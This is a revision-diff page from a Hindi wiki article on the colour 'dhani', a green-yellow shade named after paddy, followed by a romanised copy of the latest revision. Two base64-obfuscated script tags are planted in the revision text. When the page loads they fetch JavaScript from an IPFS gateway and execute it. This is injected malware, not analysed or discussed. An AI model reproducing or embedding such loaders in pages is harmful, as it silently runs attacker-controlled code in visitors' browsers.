Difference between revisions of "धानी रंग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (धानी का नाम बदलकर धानी रंग कर दिया गया है)
m (Text replace - "{{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "{{लेख प्रगति |आधार= |प्रारम्भि�)
 
(7 intermediate revisions by 4 users not shown)
Line 1: Line 1:
 +
[[रंग|रंगो]] का हमारे जीवन में बहुत महत्त्व है। रंगो से हमें विभिन्न स्थितियों का पता चलता है। हम अपने चारों तरफ अनेक प्रकार के रंगो से प्रभावित होते हैं। रंग, मानवी आँखों के [[वर्णक्रम]] से मिलने पर छाया सम्बंधी गतिविधियों से उत्पन्न होते हैं।
 
*धानी रंग [[हरा रंग|हरे]] और [[पीला रंग|पीले]] रंग के मिश्रण से प्राप्त होता है।  
 
*धानी रंग [[हरा रंग|हरे]] और [[पीला रंग|पीले]] रंग के मिश्रण से प्राप्त होता है।  
 
*[[धान]] के रंग का होने के कारण इसका नाम धानी पड़ गया।  
 
*[[धान]] के रंग का होने के कारण इसका नाम धानी पड़ गया।  
 
*धानी रंग को आस्टवाल्ड वर्ण चक्र के आदर्श रंगों में दर्शाया गया है।
 
*धानी रंग को आस्टवाल्ड वर्ण चक्र के आदर्श रंगों में दर्शाया गया है।
 
+
{{प्रचार}}
 
+
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति
+
==संबंधित लेख==
|आधार=आधार1
+
{{रंग}}
|प्रारम्भिक=
+
[[Category:रंग]][[Category:भौतिक विज्ञान]][[Category:विज्ञान कोश]]
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
[[Category:नया पन्ना]]
 
 
__INDEX__
 
__INDEX__
[[Category:रंग]]
 

Latest revision as of 07:27, 27 July 2012

rango ka hamare jivan mean bahut mahattv hai. rango se hamean vibhinn sthitiyoan ka pata chalata hai. ham apane charoan taraph anek prakar ke rango se prabhavit hote haian. rang, manavi aankhoan ke varnakram se milane par chhaya sambandhi gatividhiyoan se utpann hote haian.

  • dhani rang hare aur pile rang ke mishran se prapt hota hai.
  • dhan ke rang ka hone ke karan isaka nam dhani p d gaya.
  • dhani rang ko astavald varn chakr ke adarsh rangoan mean darshaya gaya hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh